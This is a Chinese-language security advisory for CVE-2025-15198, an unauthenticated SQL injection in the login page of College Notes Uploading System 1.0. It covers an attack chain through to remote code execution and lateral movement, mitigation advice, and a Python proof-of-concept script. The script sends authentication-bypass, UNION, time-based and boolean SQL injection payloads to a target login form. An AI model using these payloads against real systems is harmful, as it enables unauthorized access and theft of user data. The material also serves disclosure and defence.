CVE-2025-15198: code-projects College Notes Uploading System 1.0 SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-15198

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

code-projects College Notes Uploading System 1.0

漏洞概述

CVE-2025-15198是code-projects平台开发的College Notes Uploading System 1.0版本中的一个高危SQL注入漏洞。该漏洞存在于登录页面/login.php中，攻击者可通过User参数注入恶意SQL语句，无需任何认证即可利用此漏洞。CVSS评分7.3，属于高危级别漏洞。漏洞影响该系统的机密性、完整性和可用性，可能导致数据库敏感信息泄露、认证绕过甚至服务器完全沦陷。由于该漏洞的利用代码已在互联网上公开，攻击者可以轻松获取并发起攻击，对使用该系统的教育机构和企业构成严重安全威胁。建议受影响的用户立即采取修复措施或使用临时缓解方案。

技术细节

该SQL注入漏洞位于College Notes Uploading System 1.0的/login.php文件中的User参数处理逻辑。应用程序在处理用户登录时，直接将用户输入的User参数拼接到SQL查询语句中，未进行充分的输入验证和参数化查询处理。攻击者可以通过构造特殊的SQLPayload（如使用单引号、UNION SELECT、布尔盲注等技术）来操纵SQL查询语句。成功利用此漏洞后，攻击者可以：1）绕过登录认证，以管理员身份进入系统；2）提取数据库中的用户凭证、课程信息、笔记内容等敏感数据；3）在某些配置下，可能通过SQL注入进一步利用数据库的系统函数执行系统命令，实现远程代码执行。攻击向量为网络形式，无需认证和用户交互，门槛较低。

攻击链分析

STEP 1

步骤1: 侦察与目标识别

攻击者识别目标网站使用的College Notes Uploading System 1.0版本，确认登录页面/login.php存在

STEP 2

步骤2: 漏洞探测

攻击者访问/login.php页面，使用SQL注入测试Payload（如单引号、UNION SELECT等）探测User参数的SQL注入漏洞

STEP 3

步骤3: 构造恶意Payload

确认漏洞存在后，攻击者构造针对性的SQL注入Payload，可以是UNION注入、布尔盲注或时间盲注技术

STEP 4

步骤4: 绕过认证或数据提取

通过SQL注入绕过登录认证获取管理员权限，或提取数据库中的用户信息、课程数据、笔记内容等敏感信息

STEP 5

步骤5: 权限提升与持久化

在获取数据库访问权限后，可能利用数据库系统函数执行系统命令，实现远程代码执行并建立持久化后门

STEP 6

步骤6: 横向移动

利用获取的凭证信息尝试访问同一网络中的其他系统，或进一步窃取更多敏感数据

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-15198 PoC - SQL Injection in College Notes Uploading System 1.0
# Target: /login.php User parameter

def exploit_sqli(target_url):
    """
    SQL Injection PoC for CVE-2025-15198
    Tests for boolean-based blind SQL injection in User parameter
    """
    # Normal request to establish baseline
    normal_data = {
        'User': 'admin',
        'Password': 'test',
        'login': ''
    }
    
    # SQL Injection payloads
    payloads = [
        "admin' OR '1'='1",  # Basic authentication bypass
        "admin' UNION SELECT 1,2,3--",  # UNION-based injection
        "admin' AND SLEEP(5)--",  # Time-based blind injection
        "admin' AND 1=1--",  # Boolean-based true condition
        "admin' AND 1=2--"  # Boolean-based false condition
    ]
    
    print(f'[*] Target: {target_url}')
    print(f'[*] Testing SQL Injection vulnerabilities...')
    
    for payload in payloads:
        data = {
            'User': payload,
            'Password': 'test',
            'login': ''
        }
        try:
            response = requests.post(target_url, data=data, timeout=10)
            print(f'[+] Payload tested: {payload}')
            print(f'    Status: {response.status_code}')
            if 'success' in response.text.lower() or 'dashboard' in response.text.lower():
                print(f'    [!] Potential vulnerability confirmed!')
        except requests.RequestException as e:
            print(f'[-] Error testing payload: {e}')
    
    print('[*] PoC execution completed')
    print('[*] Manual verification recommended')

if __name__ == '__main__':
    if len(sys.argv) > 1:
        exploit_sqli(sys.argv[1])
    else:
        print('Usage: python cve_2025_15198_poc.py <target_url>')
        print('Example: python cve_2025_15198_poc.py http://target.com/login.php')

影响范围

code-projects College Notes Uploading System 1.0

防御指南

临时缓解措施

在官方修复补丁发布之前，可采取以下临时缓解措施：1）在前端和后端同时部署输入验证机制，过滤SQL特殊字符如单引号、双引号、分号等；2）启用Web应用防火墙规则阻止常见的SQL注入攻击模式；3）限制/login.php页面的访问频率，防止自动化攻击；4）临时关闭系统或切换到安全的替代系统；5）加强数据库日志监控，及时发现异常查询行为；6）隔离受影响的系统，防止攻击成功后的横向移动。建议尽快升级到官方发布的安全版本。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15198
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15198
3 Details https://www.cvedetails.com/cve/CVE-2025-15198/
4 VulDB https://vuldb.com/cve/CVE-2025-15198
5 Link https://code-projects.org/
6 Link https://github.com/Limingqian123/CVE/issues/10
7 Link https://vuldb.com/?ctiid.338585
8 Link https://vuldb.com/?id.338585
9 Link https://vuldb.com/?submit.724724